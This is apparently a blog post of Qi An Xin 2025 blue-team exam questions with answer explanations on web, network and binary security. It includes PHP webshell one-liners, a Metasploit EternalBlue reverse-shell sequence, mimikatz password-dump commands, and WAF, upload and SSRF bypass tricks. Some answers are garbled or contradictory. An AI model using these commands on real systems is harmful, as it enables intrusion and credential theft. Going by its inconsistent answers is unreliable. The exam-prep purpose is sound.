目录

奇安信-2025-年护网蓝队初选笔试题附答案解析

目录

奇安信 2025 年护网蓝队初选笔试题(附答案解析)

🔥 爆款 CSDN 题库 | 超全护网蓝队笔试真题 | 含详细答案解析 🔥

熬夜为大家整理了 奇安信 2025 年护网蓝队初选笔试题 ,(关注我我会持续更新)涵盖 SQL 注入、Web 安全、渗透测试、二进制安全 等核心知识点,并附上 详细答案解析 ,助力大家高效备考!

12.下列关于虚表指针描述正确的是(1.5分)

✅ B. 虚表指针存储的是虚表的首地址

❌ A. 任何类对象都存在虚表指针(仅含虚函数的类有)

❌ C. 虚表指针位于对象内存空间的起始处(由编译器决定)

❌ D. 虚表指针是否存在不影响对象所占内存空间的大小(存在时会增加指针大小)

📌 解析:

虚表指针(vptr)用于实现多态,指向类的虚函数表首地址。只有包含虚函数的类对象才会存在虚表指针,其位置由编译器决定(通常位于对象内存起始处,但不绝对),且会增加对象内存占用。

  1. MySQL基线检查中要求进行日志审核检查,以下关于日志审核加固方法正确的是?(1.5分)

✅ C. 在my.cnf 或my.ini 文件中,[mysqld]后添加 log-error= 并配置日志文件

❌ A. log-update=(已弃用,属于旧版更新日志)

❌ B. log-bin=(二进制日志,用于主从复制,非安全审计核心)

❌ D. #log=(通用查询日志,非基线强制要求)

📌 解析:

MySQL基线检查需确保错误日志(log-error)开启,记录数据库运行中的错误和警告,是安全事件追溯的关键。其他日志类型(如二进制日志、查询日志)根据需求选择性配置。

  1. RFI可以成功利用时,需要php.ini 中进行()配置(1.5分)

✅ A. allow_url_include = On

❌ B. allow_url_fopen = On(仅控制远程文件读取,非包含执行)

❌ C/D. allow_url_include = Off(禁用则无法触发RFI)

📌 解析:

远程文件包含(RFI)需同时满足:allow_url_fopen=On(允许读取远程文件)和 allow_url_include=On(允许包含远程文件作为代码执行)。

  1. 微擎CMS存在哪些漏洞(1.5分)

✅ B. 1.8.2后台getshell

✅ C. 低权限后台getshell

❌ A. 0.8后台任意文件删除(版本不匹配,实际漏洞需验证)

❌ D. 0.7 SQL注入漏洞(需具体CVE编号佐证)

📌 解析:

微擎CMS历史漏洞包括后台getshell(如1.8.2版本权限校验不严)、低权限用户通过接口上传恶意文件等。其他选项需结合具体漏洞公告验证。

  1. 关于SQL注入的防御方式有哪些?(1.5分)

✅ A. 部署WAF等安全设备

✅ B. 增加过滤(如特殊字符转义)

✅ C. 使用参数化语句(预编译)

❌ D. 动态拼接SQL(导致注入风险)

📌 解析:

防御SQL注入的核心是“输入不可信”,需通过预编译(参数化查询)、过滤/白名单校验、最小权限数据库账户、WAF拦截等多层防护。

  1. 下列属于SQL注入绕过WAF的方法是(1.5分)

✅ A. 注释符(如–、#)

✅ C. 内联注释(如/ !UNION /)

✅ D. 替换关键字(如UNI/**/ON)

❌ B. 无法绕过(实际存在多种绕过手段)

📌 解析:

WAF绕过技术包括:注释混淆、字符编码(如十六进制)、多语句拆分、内联注释利用数据库特性、等价函数替换(如substring→mid)等。

  1. 以下用来显示文件内容的命令有哪些?(1.5分)

✅ A. cat

✅ B. less

✅ C. head

✅ D. more

📌 解析:

cat:直接输出全部内容

less/more:分页浏览

head:显示文件开头部分

其他类似命令:tail(显示末尾)、nl(带行号输出)。

  1. 下面哪个是对SSRF的防御?(1.5分)

✅ A. 限制端口(如仅允许80/443)

✅ C. 过滤返回信息(避免敏感数据泄露)

✅ D. 限制IP(禁止内网IP请求)

❌ B. 过滤POST参数(SSRF通常通过URL参数触发)

📌 解析:

SSRF(服务端请求伪造)防御需:禁用非常用协议(如file://、gopher://)、限制请求目标为白名单域名/IP、禁用重定向、校验响应内容类型等

14. 常见的WEB攻击方法有以下哪些?(1.5分)

✅ A. XSS

✅ B. SQL注入

✅ C. cookie欺骗

📌 解析

  • XSS(跨站脚本攻击) :通过注入恶意脚本劫持用户会话或窃取信息。

  • SQL注入 :通过构造恶意SQL语句操纵数据库,获取敏感数据或执行系统命令。

  • Cookie欺骗 :伪造或篡改Cookie内容,绕过身份验证或提升权限。

    其他常见Web攻击:CSRF、SSRF、文件上传漏洞、命令注入等。


15. Goby支持哪几种代理扫描?(1.5分)

✅ A. HTTP

✅ C. HTTPS

✅ D. Socket

❌ B. Pcap(Goby不支持Pcap协议代理扫描)

❌ D. SSH登录暴力破解(属于爆破功能,非代理扫描)

📌 解析

Goby的代理扫描支持HTTP/HTTPS/Socket协议,用于绕过防火墙或匿名扫描。SSH暴力破解是独立功能,需通过插件或自定义脚本实现。


38. 在Java中可用于执行系统命令的方式有()(1.5分)

✅ A. java.lang.Runtime

✅ D. java.lang.ProcessBuilder

❌ B. java.lang.UNIXProcess/ProcessImpl (具体实现类,开发者不直接调用)

❌ C. java.lang.Process (抽象接口,需通过Runtime或ProcessBuilder实例化)

📌 解析

  • Runtime.exec() :直接执行命令,返回Process对象。

  • ProcessBuilder :更灵活的命令执行方式,支持重定向输入输出和环境变量配置。

    ⚠️ 注意:直接执行系统命令可能导致代码注入漏洞(如参数未过滤)。


39. 关于Weblogic SSRF漏洞(CVE-2014-4210)说法正确的是(1.5分)

✅ B. 实战中可通过爆破,根据返回包长度判断开放端口

✅ C. 通过错误信息探测内网状态

✅ D. 访问 /uddiexplorer/SearchPublicRegistries.jsp 可判断漏洞存在

❌ A. 影响版本应为:10.0.2.0、10.3.6.0、12.1.2.0(原选项版本描述不准确)

📌 解析

  • 漏洞利用 :通过构造恶意URL参数(如 operator= )触发SSRF,探测内网服务。
  • 检测方法 :返回包长度差异或错误信息(如 404 / 503 )可推断端口开放状态。
  • 修复建议 :升级至安全版本,禁用 uddiexplorer 组件。

40. 下列常用端口,可能用于反射放大DDoS攻击的有(1.5分)

✅ A. NTP 123/udp(NTP反射攻击)

✅ C. memcache 11211/udp(Memcached放大攻击)

❌ B. DNS 53/tcp(DNS反射通常用UDP协议)

❌ D. HTTPS 443/tcp(TCP协议无法有效放大流量)

📌 解析

反射放大攻击依赖UDP协议和无认证响应机制:

  • NTPmonlist 命令可放大200倍流量。

  • Memcached :单请求可触发数万倍响应数据。

    其他高危协议:SSDP(1900/udp)、CharGen(19/udp)。


35. 以下说法正确的是()(1.5分)

✅ B. C:\Windows\win.ini 是保存系统配置的重要文件

✅ C. hosts文件优先级高于DNS解析

❌ A. C:\Windows\System32 存放系统核心文件(用户配置文件在 C:\Users

❌ D. C:\ProgramData 存放程序共享数据(病毒常锁定用户目录如 AppData

📌 解析

  • hosts文件 :路径为 C:\Windows\System32\drivers\etc\hosts ,优先于DNS解析。
  • win.ini :早期Windows版本的系统配置文件,现代系统仍保留兼容性支持。

36. 以下哪种场景可能会感染病毒?(1.5分)

✅ A. 从陌生网站下载软件

✅ B. 下载陌生邮件附件

✅ C. 关闭系统更新功能(无法修复漏洞)

✅ D. 随意插入U盘(自动运行恶意脚本)

📌 解析

病毒传播途径:

  • 软件捆绑 :破解软件、游戏外挂。
  • 钓鱼邮件 :伪装为发票、订单的恶意附件(.exe、.js、.docm)。
  • U盘蠕虫 :利用 autorun.inf 自动执行。

35. 下列关于格式化字符串漏洞的说法正确的是()(1.5分)

✅ B. %n 将已输出字节数写入指定地址

✅ C. %4$x 直接访问第四个参数(简化利用)

✅ E. %hn / %hhn 避免一次性写入过大数值

❌ A. 写0时需构造256溢出(实际写0需通过 %n 计算偏移)

📌 解析

  • 漏洞原理 :攻击者控制格式化字符串(如 printf(user_input) ),通过 %x 泄露内存或 %n 篡改内存。
  • 利用技巧
    • %<N>c%<M>$n :向第M个参数指向的地址写入N字节。
    • %hhn 写入1字节, %hn 写入2字节,分阶段覆盖内存(如修改GOT表)

32. SQL注入包含下列哪些类型?(1.5分)

✅ A. 延时注入

✅ C. 报错注入

✅ E. 二次注入

❌ B. XXE注入(属于XML实体注入,与SQL无关)

📌 解析

  • 延时注入 :通过 sleep() 等函数盲注,根据响应时间推断数据。

  • 报错注入 :利用数据库错误回显(如 floor(rand()*2) )泄露信息。

  • 二次注入 :首次注入数据被存储,后续流程触发恶意代码。

    其他类型:联合查询注入、布尔盲注、堆叠查询(Stacked Query)。


31. 关于硬件断点的描述正确的是(1.5分)

✅ A. 不会修改程序的内存

✅ B. 可通过 GetThreadContext 检测

❌ C. 可以设置无数个(x86架构仅支持4个硬件断点)

❌ D. 不会修改调试寄存器(需占用调试寄存器DR0-DR3)

📌 解析

硬件断点通过CPU调试寄存器实现,不修改代码内存(与软件断点 int3 不同),适用于动态跟踪内存访问或执行流。调试工具(如x64dbg)可调用API检测寄存器状态。


26. 有关文件包含漏洞防御的说法正确的是()(1.5分)

✅ C. 从代码层和Web服务器配置两方面防范

✅ A. 限定可包含文件目录(如PHP open_basedir

✅ D. 代码层定义文件白名单(如 include($_GET['file'].'.php')

❌ B. 定义目录白名单(需结合文件白名单更安全)

📌 解析

  • 代码层 :禁用动态包含(如 include($_GET['file']) ),使用固定后缀或哈希校验。
  • 服务器层 :配置目录权限限制,禁用高危函数(如 allow_url_include=Off )。

23. .Net的BinaryFormatter反序列化漏洞利用条件为()(1.5分)

✅ C. Deserialize 反序列化的内容用户可控

✅ D. .Net SDK ≤4.5(4.5+默认禁用 BinaryFormatter

❌ A. Serialize 内容可控(仅影响数据生成,非漏洞触发)

❌ B. SDK ≥4.5(漏洞在4.5以下版本未修复)

📌 解析

BinaryFormatter 因未验证反序列化数据导致RCE(如 ysoserial 生成Payload)。微软建议使用 DataContractSerializer 替代,并设置 SerializationBinder 限制类型。


24. OllyDBG中可采用什么方法断在指定DLL加载处?(1.5分)

✅ A. 设置中断在新模块加载事件

✅ D. 对 LoadLibrary 等函数下断点

❌ B/C. 输出表/导入表断点(适用于函数调用,非模块加载)

📌 解析

  • 模块加载事件 :通过 Options → Debugging options → Events → Break on new module 实现。
  • API断点 :对 LoadLibraryWLdrLoadDll 下断点,捕获动态加载的DLL路径。

22. SQL注入漏洞可能会出现在()位置(1.5分)

✅ A. HTTP请求报文的Host字段

✅ B. Cookie

✅ C. Referer

✅ D. GET参数

📌 解析

任何用户可控且拼接至SQL语句的参数均可能触发注入:

  • Host字段 :部分框架将Host直接用于数据库查询。
  • Header字段 :如 X-Forwarded-For 记录日志时未过滤。

19. Burp Suite支持做以下哪些操作?(1.5分)

✅ A. 枚举用户(Intruder模块爆破用户名)

✅ B. 编码解码(Decoder模块Base64/URL/HTML转换)

✅ C. 数据包重放(Repeater模块修改并重发请求)

✅ D. 抓包拦截(Proxy模块拦截HTTPS流量)

📌 解析

Burp Suite核心功能:

  • Scanner :自动化漏洞扫描(如SQLi/XSS)。
  • Collaborator :检测带外(OAST)漏洞。
  • Extender :插件扩展(如Log4j漏洞检测)。

25. 下列()不是SQLi辅助工具(1.5分)

✅ A. nslookup(DNS查询工具)

✅ B. dig(DNS解析工具)

✅ D. dnsenum(DNS子域名枚举工具)

❌ C. sqlmap(SQL注入自动化工具)

📌 解析

  • SQLi专用工具 :sqlmap、Havij、Pangolin。
  • 网络工具 :nslookup/dig用于域名解析,与注入无关。

34. Linux中,可以列目录的命令有哪些?(1.5分)

✅ A. /bin/[r-t] (通配符匹配 /bin/ls ,需环境支持)

✅ B. echo ./* (列出当前目录下所有文件)

✅ C. find . -maxdepth 1 (等效 ls ,但输出格式不同)

❌ D. /???/Is (路径正确但 Is 拼写错误,应为 ls

📌 解析

  • /bin/[r-t] :通配符 [r-t] 匹配字母范围,若存在 /bin/ls 则执行。
  • echo ./* :输出当前目录所有文件名(依赖Shell扩展)。
  • find 命令-maxdepth 1 限制仅搜索当前目录。
  • 常见命令lsdir (部分Shell兼容)、 tree -L 1 (树状结构)。

37. 以下哪个选项为PHP一句话木马?(1.5分)

✅ D. <?php $_GET['eval']($_POST['test']); ?> (动态调用函数,可执行任意代码)

❌ A. eval($ POST[test]) (语法错误: $ POST 应为 $_POST

❌ B. echo "test" (无恶意行为)

❌ C. <script>alert(1)</script> (XSS脚本,非PHP木马)

📌 解析

  • D选项 :通过 $_GET['eval'] 获取函数名(如 assert ),执行 $_POST['test'] 中的代码。
  • 典型一句话木马<?php @eval($_POST['cmd']); ?> ,隐蔽性强且支持加密传输。

32. Linux的每类用户拥有三种权限分别是?(1.5分)

✅ A. r(读取)

✅ B. w(写入)

✅ C. x(执行)

❌ D. s(特殊权限,如SUID/SGID)

📌 解析

  • 基础权限
    • r :查看文件内容或列目录。
    • w :修改文件或删除目录内文件。
    • x :执行程序或进入目录。
  • 特殊权限
    • s :SUID(用户继承文件所有者权限)、SGID(目录继承组权限)。
    • t :粘滞位(限制目录文件删除权限)。

33. 以下哪些是文件上传绕过方法?(1.5分)

✅ A. %00截断 (利用空字节终止字符串,如 file.php%00.jpg

✅ B. 变换文件后缀名大小写 (如 .PhP 绕过黑名单)

✅ C. 黑名单不全绕过 (如未过滤 .phtml.phar

✅ D. 利用Windows系统特性绕过 (如 file.php:.jpg 流文件)

📌 解析

  • 其他绕过手段
    • 双扩展名file.php.jpg (部分解析漏洞)。
    • Content-Type篡改 :如图片MIME类型( image/jpeg )。
    • 文件头伪造 :添加图片魔数(如 GIF89a )。
    • .htaccess覆盖 :自定义解析规则(Apache服务器)。

34. 修改 java.io.ObjectInputStream 类的()方法检测类名合法性?(1.5分)

✅ A. resolveClass (反序列化时校验类名)

❌ B. resolveProxyClass (处理动态代理类,无关校验)

❌ C. writeObject (序列化方法)

❌ D. ReadObject (反序列化入口,需结合 resolveClass

📌 解析

  • 防御反序列化漏洞
    • 重写 resolveClass ,限制可反序列化的类(如白名单校验)。
    • 使用 SerializationFilter (Java 9+)或第三方库(如Apache Commons IO)。

33. 微警CMS存在哪些漏洞?(1.5分)

B. 低权限后台getshell

D. 1.8.2后台getshell

❌ A. 0.8后台任意文件删除(需具体漏洞公告验证)

❌ C. 0.7 SQL注入漏洞(未广泛证实)

📌 解析

微警CMS(微擎CMS)历史漏洞主要集中在后台权限管理缺陷:

  • 低权限后台getshell :低权限用户通过接口上传恶意文件或利用逻辑漏洞获取服务器权限。

  • 1.8.2版本后台getshell :管理后台存在未授权访问或文件上传校验不严,导致攻击者植入Webshell。

    其他选项需结合CVE编号验证,部分版本漏洞存在争议。


33. 以下关于CC攻击说法正确的是?(1.5分)

C. CC攻击需要借助代理进行

D. CC攻击难以获取目标机器的控制权

❌ A. CC攻击最早在国外大面积流行(起源于国内“挑战黑洞”攻击)

❌ B. CC攻击利用TCP协议缺陷(基于应用层HTTP请求耗尽资源)

📌 解析

  • CC攻击(Challenge Collapsar) :模拟大量合法请求(如HTTP GET/POST),耗尽服务器资源(CPU、带宽、连接数)。
  • 特点
    • 需通过代理或僵尸网络隐藏攻击源IP。
    • 仅导致服务拒绝,无法直接控制目标机器。

29. 在MySQL中,数据类型大致分为?(1.5分)

A. 浮点型(FLOAT、DOUBLE、DECIMAL)

B. 字符串(CHAR、VARCHAR、TEXT)

C. 整型(INTEGER、INT、BIGINT)

D. 日期/时间(DATETIME、DATE、TIMESTAMP)

📌 解析

MySQL数据类型分类:

  • 数值型INTFLOATDECIMAL (精确小数)。
  • 字符型CHAR (定长)、 VARCHAR (变长)、 BLOB / TEXT (大文本)。
  • 日期型DATE (年月日)、 TIME (时分秒)、 TIMESTAMP (时间戳)。
  • 其他ENUM (枚举)、 JSON (结构化数据)。

30. fscan如何指定密码来进行爆破?(1.5分)

C. fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt

❌ A. -pwd 参数需指定具体密码(非文件路径)

❌ B. -userf 仅指定用户名字典

❌ D. 缺少密码参数,语法错误

📌 解析

fscan常用参数:

  • -pwdf :指定密码字典文件路径(每行一个密码)。

  • -userf :指定用户名字典文件路径。

    示例: fscan -h 10.0.0.1/24 -userf users.txt -pwdf passwords.txt


31. 修改Apache的默认网页目录需要配置哪些参数?(1.5分)

B. Directory (目录权限配置)

D. DocumentRoot (主目录路径)

❌ A. sshd_config (SSH服务配置文件)

❌ C. logs (日志目录,非核心配置)

📌 解析

Apache配置示例( httpd.conf 或站点配置文件):

apache复制 DocumentRoot "/var/www/html"

<Directory "/var/www/html">

Options Indexes FollowSymLinks

AllowOverride All

Require all granted

</Directory>


27. 在Windows系统中,下列关于安全策略的功能特点哪些说法是正确的?(1.5分)

A. 本地安全策略设置分为账户策略、本地策略等5部分

B. 成员服务器的本地策略被域策略覆盖

C. 安全设置通过本地安全策略控制台管理

❌ D. 描述不完整(需结合组策略管理)

📌 解析

  • 本地安全策略 :路径为 secpol.msc ,管理密码复杂度、审计策略、用户权限分配等。
  • 组策略优先级 :域策略 > 站点策略 > 组织单元策略 > 本地策略。

28. JOnAS默认用户名密码有?(1.5分)

A. jadmin/jonas

C. jonas/jonas

❌ B. admin/123456(常见弱口令,非默认)

❌ D. tomcat/tomcat(Tomcat默认凭证)

📌 解析

JOnAS(Java Open Application Server)默认凭证:

  • jadmin/jonas :管理员账户。

  • jonas/jonas :普通用户账户。

    建议安装后立即修改默认密码。


24. 下列常用端口,可能用于反射放大DDoS攻击的有?(1.5分)

B. memcache 11211/udp

C. NTP 123/udp

❌ A. DNS 53/tcp(UDP协议更常用于反射)

❌ D. HTTPS 443/tcp(TCP协议无法放大流量)

📌 解析

  • Memcached :无认证UDP服务,单请求可触发数万倍响应(CVE-2018-11321)。

  • NTPmonlist 命令响应包放大效果显著。

    其他高危协议:SSDP(1900/udp)、SNMP(161/udp)。


25. 在自动更新的对话框中的选择项包括下列哪些?(1.5分)

A. 自动(推荐)

B. 下载更新,由用户决定何时安装

C. 仅通知可用更新

D. 关闭自动更新

📌 解析

Windows更新选项(截至2025年):

  1. 自动安装更新 :系统后台下载并安装。
  2. 下载但手动安装 :用户选择时间重启。
  3. 仅通知 :用户需主动下载。
  4. 禁用更新 :需通过组策略或注册表实现。

26. IIS6.x解析漏洞利用方式有哪些?(1.5分)

A. 文件名(如 test.asp;.jpg

D. 文件夹(如 /upload/test.asp/1.jpg

❌ B. 默认类型名(IIS6无此机制)

❌ C. 默认扩展名(与漏洞无关)

📌 解析

  • 分号截断test.asp;.jpg 被解析为ASP文件。

  • 目录解析/asp目录/1.jpg 被当作ASP执行。

    修复建议:禁用非必要脚本映射,升级至IIS7+。


22. Websphere Java反序列化(CVE-2015-7450)漏洞影响版本有?(1.5分)

A. 8.5版

B. 8.5.5传统和自由

C. 8.0版

D. 7.0版

📌 解析

CVE-2015-7450 :影响WebSphere Application Server 7.0、8.0、8.5及Liberty Profile。

  • 漏洞机制 :Apache Commons Collections库反序列化漏洞。
  • 修复方案 :升级至Fix Pack 8.5.5.9+或应用官方补丁。

23. JBoss反序列化漏洞说法正确的是?(1.5分)

C. JBoss4.x访问 /jbossmq-httpil/HTTPServerILServlet 存在漏洞

D. JBoss5.x/6.x访问 /invoker/readonly 返回500可能存在漏洞

❌ A. JMX Invoker漏洞需关闭 jmx-invoker-service.xml

❌ B. WLS Security漏洞属于WebLogic(非JBoss)

📌 解析

  • JBoss反序列化漏洞
    • 4.x版本/jbossmq-httpil/HTTPServerILServlet 未授权访问,可执行任意代码。

    • 5.x/6.x版本/invoker/readonly 接口反序列化漏洞(CVE-2017-12149)。

      修复建议:删除或限制访问高危接口,升级至EAP 7+。


20. 下面哪个是对SSRF的防御?(1.5分)

A. 限制IP(禁止内网IP请求)

B. 限制端口(仅允许80/443)

C. 过滤返回信息(避免敏感数据泄露)

❌ D. 过滤POST参数(SSRF通常通过URL触发)

📌 解析

SSRF防御策略

  • 协议白名单 :仅允许HTTP/HTTPS。
  • 目标限制 :禁止访问内网IP和非常用端口。
  • 响应过滤 :屏蔽错误信息中的内网拓扑数据。

21. 关于漏洞修复以下说法正确的是?(1.5分)

A. 高稳定性环境需综合评估修复优先级

B. 修复可能影响业务连续性

❌ C. 极高危漏洞必须修复(不可忽略)

❌ D. Linux无需频繁升级(仍需定期更新)

📌 解析

漏洞修复原则:

  • 风险评估 :结合CVSS评分、资产价值、利用可能性排序。
  • 测试验证 :生产环境需在测试环境验证补丁兼容性。
  • 备份回滚 :修复前备份系统,制定回滚方案。

17. 关于OpenSSL心脏出血漏洞修复说法正确的是?(1.5分)

C. 升级后需生成新密钥(原密钥可能泄露)

D. 升级至最新版本可解决

❌ A. 旧密钥可继续使用(存在被窃取风险)

❌ B. 用户需改密(漏洞泄露内存数据,非密码)

📌 解析

Heartbleed(CVE-2014-0160)修复步骤

  1. 升级OpenSSL至1.0.1g+或1.0.2+。
  2. 吊销旧证书并重新签发。
  3. 重启服务确保新版本生效。

18. IIS中间件文件上传漏洞利用方式有哪些?(1.5分)

A. 目录解析( a.asp/ 下任意文件解析为ASP)

D. 分号截断( test.asp;.jpg

❌ B. 路径后加 .php (IIS6不支持PHP解析)

❌ C. 路径前加 /php (无实际意义)

📌 解析

  • IIS6解析漏洞
    • 文件夹解析/asp_dir/1.jpg 被当作ASP执行。

    • 分号截断test.asp;.jpg 忽略分号后内容。

      修复方案:禁用非必要脚本映射,使用URL重写过滤异常请求

19. 绕过SSRF过滤的进制转换方式

B. 十六进制 (如 0x7F000001 → 127.0.0.1)

D. 八进制 (如 0177.0.0.1 → 127.0.0.1)

❌ A. 十进制(需服务端支持转换,较少直接使用)

❌ C. 二进制(实际应用中难以直接拼接)

📌 解析

SSRF过滤通常拦截标准IP格式,通过以下方式绕过:

  • 十六进制 : → 127.0.0.1。
  • 八进制 : → 127.0.0.1。
  • 十进制 : → 127.0.0.1(部分场景有效)。

15. Web应用组件漏洞的正确说法

B. 组件可能出现多种漏洞

C. 漏洞可能导致数据泄露

❌ A. 漏洞影响小(如Log4j漏洞影响全球系统)

❌ D. 组件无漏洞(所有软件均可能存漏洞)

📌 解析

  • 组件漏洞危害 :如Apache Struts2漏洞(CVE-2017-5638)可导致RCE。
  • 防御建议 :定期更新第三方库,使用SCA工具(如Dependency-Check)扫描依赖。

16. 木马躲避杀毒手法

A. 伪造数字签名

B. 动态获取函数地址(API混淆)

C. 内存/网络加载模块(无文件攻击)

D. 加壳混淆(如UPX、VMProtect)

📌 解析

  • 加壳工具 :Themida、Armadillo隐藏代码特征。
  • 内存加载 :使用 Reflective DLL Injection 规避文件扫描。

12. DNS信息查询工具

A. nslookup (基础DNS查询)

D. dig (详细DNS记录解析)

❌ B. sqlmap(SQL注入工具)

❌ C. volatility(内存取证工具)

📌 示例命令

bash复制 dig MX # 查询邮件服务器记录

nslookup -type=AAAA

# 查询IPv6地址


16. Windows钩子(Hook)错误说法

B. 钩子是网络通信程序 (错误,钩子用于消息处理)

C. 钩子是应用程序 (错误,钩子是函数级拦截机制)

❌ A/D正确(钩子处理消息,属于窗口函数机制)

📌 应用场景

  • 键盘钩子 :记录按键输入(如恶意键盘记录器)。
  • 消息钩子 :拦截窗口事件(如UI自动化测试)。

18. 蓝凌OA漏洞

A. EKP后台SQL注入

B. 前台SSRF到RCE

C. 任意文件上传

C. 前台SQL注入 (选项重复,可能为笔误)

📌 修复建议

  • 限制文件上传类型,禁用危险协议(如 file:// )。
  • 对用户输入参数化查询,避免SQL注入。

14. 正确的网络基础说法

A. IPv6为128位 (如 2001:0db8:85a3::8a2e:0370:7334

B. 192.168.8.1属C类私有IP (范围 192.168.0.0/16

C. C类默认掩码255.255.255.0

D. 127.0.0.1为本机地址

📌 扩展知识

  • 私有IP范围
    • A类: 10.0.0.0/8
    • B类: 172.16.0.0/12
    • C类: 192.168.0.0/16

10. Metasploit模块

A. Auxiliary (信息收集、扫描)

B. Payload (攻击载荷,如反向Shell)

C. Exploits (漏洞利用代码)

❌ D. Listen(非独立模块,属于Payload配置)

📌 常用命令

bash复制 use exploit/windows/smb/ms17_010_eternalblue

set RHOST 192.168.1.1

set PAYLOAD windows/x64/meterpreter/reverse_tcp

exploit


11. PHP危险函数

A. system()

C. exec()

D. shell_exec()

❌ B. phpinfo()(信息泄露,不直接执行命令)

📌 防御措施

  • 禁用高危函数( disable_functions=system,exec )。
  • 使用安全函数(如 escapeshellarg() 过滤参数)。

12. SQLMap支持的数据库

A. Oracle

C. MySQL

D. MSSQL

❌ B. MongoDB(NoSQL注入需专用工具如NoSQLMap)

📌 示例命令

bash复制 sqlmap -u " --dbms=mysql

sqlmap -u " --dbms=oracle


7. Mimikatz功能

A. 获取账号密码 (从LSASS进程提取)

B. 哈希传递(Pass-the-Hash)

C. 票据传递(Pass-the-Ticket)

❌ D. 代理转发(需配合其他工具如Proxifier)

📌 经典命令

bash复制 mimikatz # privilege::debug

mimikatz # sekurlsa::logonpasswords


8. 命令执行函数

A. pcntl_exec()

C. popen()

D. passthru()

❌ B. phpinfo()(仅信息输出)

📌 风险示例

php复制 <?php

passthru($_GET['cmd']); // 直接执行用户输入命令

?>


SQL查询问题:数学最高分姓名

B. select name where math is (select max(math)...) (语法错误, is 用于NULL判断)

✅ 其他选项正确(A/C/D均等价, =in 匹配唯一值)

📌 解析

  • 错误原因IS 用于比较 NULL ,如 math IS NULL
  • 正确语法WHERE math = (SELECT MAX(math) ...)

13. 社会工程学信息收集方法

B. 通过获取管理员信任获取密码 (如钓鱼邮件、伪装身份)

D. 通过办公室电话、姓名、生日猜测密码 (利用个人信息构造弱口令)

❌ A. 破解SAM库(技术手段,非社会工程学)

❌ C. 暴力破解工具(自动化攻击,非社会工程学)

补充

社会工程学的核心是 利用人性弱点 获取信息,例如:

  • 钓鱼攻击 :伪造登录页面诱导用户输入密码。
  • 电话诈骗 :冒充IT人员索要账户信息。
  • 垃圾翻查 (Dumpster Diving):从废弃文件中提取敏感信息。

13. FineCMS漏洞

D. 前台getshell (如文件上传漏洞直接获取Webshell)

B. CSRF修改管理员密码 (跨站请求伪造攻击)

❌ A. SSRF(需具体漏洞验证)

❌ C. 远程文件包含(未广泛披露)

背景

FineCMS历史漏洞案例:

  • 前台getshell :通过未过滤的上传功能植入恶意脚本(如 /index.php?c=attachment&a=upload )。
  • CSRF修改密码 :构造恶意链接诱使管理员点击,触发密码重置。

14. MSSQL删除无关账号的正确操作

B. 企业管理器→安全性→登录中删除账号 (主登录入口)

C. 企业管理器→数据库→用户中删除账号 (数据库级权限)

❌ A. 管理→删除账号(路径不准确)

❌ D. 服务器角色→删除账号(角色管理,非直接删除账号)

操作示例

  1. 主登录账号: 安全性→登录名→右键删除

  2. 数据库用户: 数据库→用户→右键删除

    注意 :需同步清理数据库用户与登录名的映射关系。


9. 致远(Seeyon)OA漏洞

A. A8 search_result.jsp SQL注入 (CVE-2018-7314)

D. A8 htmlofficeservlet getshell (CVE-2017-10245)

❌ B. 任意用户密码修改(需结合其他漏洞)

❌ C. setextno.jsp SQL注入(未广泛证实)

漏洞利用

  • htmlofficeservlet getshell :上传构造的 .jsp 文件绕过过滤,路径如 /seeyon/htmlofficeservlet
  • 修复建议 :升级至最新版本,禁用危险接口。

10. 满足安全要求的操作

A. 密码策略复杂度要求 (符合NIST标准)

D. 使用VPN连接 (加密通信,防止中间人攻击)

❌ B. 密码永不过期(违反定期更换原则)

❌ C. 开启Telnet(明文传输,不安全)

扩展建议

  • 多因素认证 :结合短信、令牌等增强安全性。
  • 日志审计 :监控异常登录行为。

11. IIS容器常见漏洞

B. 短文件名漏洞 (泄露文件路径,如 test~1.asp

D. 解析漏洞 (如 test.asp;.jpg 被解析为ASP)

❌ A. HTTP.sys 漏洞(CVE-2015-1635,需具体版本)

❌ C. 反序列化漏洞(常见于.NET应用,非IIS自身)

防御措施

  • 短文件名漏洞 :禁用 8.3 文件名格式( fsutil behavior set disable8dot3 1 )。
  • 解析漏洞 :配置 Handler Mappings 限制可执行文件类型。

6. 网络排错命令作用

B. Netstat显示网络信息 (连接、端口、路由表)

C. Ping测试连通性

D. Telnet测试端口开放 (如 telnet 192.168.1.1 80

❌ A. Tracert查看IP网卡信息(实际用于追踪路由路径)

常用命令示例

bash复制 netstat -ano | findstr "ESTABLISHED" # 查看活动连接

tracert 8.8.8.8 # 追踪到Google DNS的路由


7. Linux操作系统安全描述

A. 保持系统补丁更新 (如 yum updateapt upgrade

C. 最小安装原则 (减少攻击面)

D. 关闭无关服务 (如 systemctl disable telnet

❌ B. 全安装增加便利性(违反最小化安全原则)

安全实践

  • 禁用root远程登录 :修改 /etc/ssh/sshd_configPermitRootLogin no
  • 配置防火墙 :使用 iptablesfirewalld 限制端口访问。
8. Tomcat JSP编译生成文件

C. index jsp.class

D. index jspjava

📝 解析

Tomcat的Jasper引擎将JSP编译为Java文件(如 index_jsp.java )和Class文件(如 index_jsp.class )。选项C和D命名格式错误(缺少下划线),故不会生成。


5. ThinkPHP 6.x漏洞

D. Thinkphp<6.0.2 session id未过滤导致getshell

📝 解析

  • CVE-2021-43767 :Session ID未严格过滤,攻击者构造恶意Session ID触发反序列化漏洞。
  • 其他选项需结合具体CVE验证,但D为广泛确认的漏洞。

4. 事件ID描述

B. 4625登录失败

📝 解析

  • 4624 :登录成功。

  • 4625 :登录失败。

  • 4720 :用户账户创建。

    选项B正确,D错误(4624应为成功)。


3. 数据库加密技术分类

A. 库加密

B. 列加密

📝 解析

  • 库加密 :全库或表空间级加密(如Oracle TDE)。

  • 列加密 :字段级加密(如敏感数据单独加密)。

    行加密(D)和表加密(C)属于子类,但题目要求主要分类。


1. 代码安全问题

C. SQL注入

📝 解析

sprintf 直接拼接用户输入( argv[1] )到SQL语句,未过滤单引号,导致注入。

示例攻击: ' OR 1=1 -- 可绕过条件查询。


2. IIS短文件名生成条件

B. 后缀<4时,前缀长度≥9

D. 后缀≥4时,前缀长度1

📝 解析

  • 规则 :文件名前缀超8字符或后缀超3字符时生成短名。
  • 示例longfilename.txtLONGFI~1.TXT

单选题答案

25. 查看本机IP命令

A. ipconfig

📝 补充ipconfig /all 显示详细网络配置(IPv6地址、MAC地址等)。


26. 代理服务非优点

C. 防范数据驱动侵袭

📝 解析 :代理无法阻止恶意文件(如PDF漏洞利用),需依赖终端防护。


27. Hydra指定用户名参数

C. -l

📝 示例hydra -l admin -P passlist.txt ssh://192.168.1.1


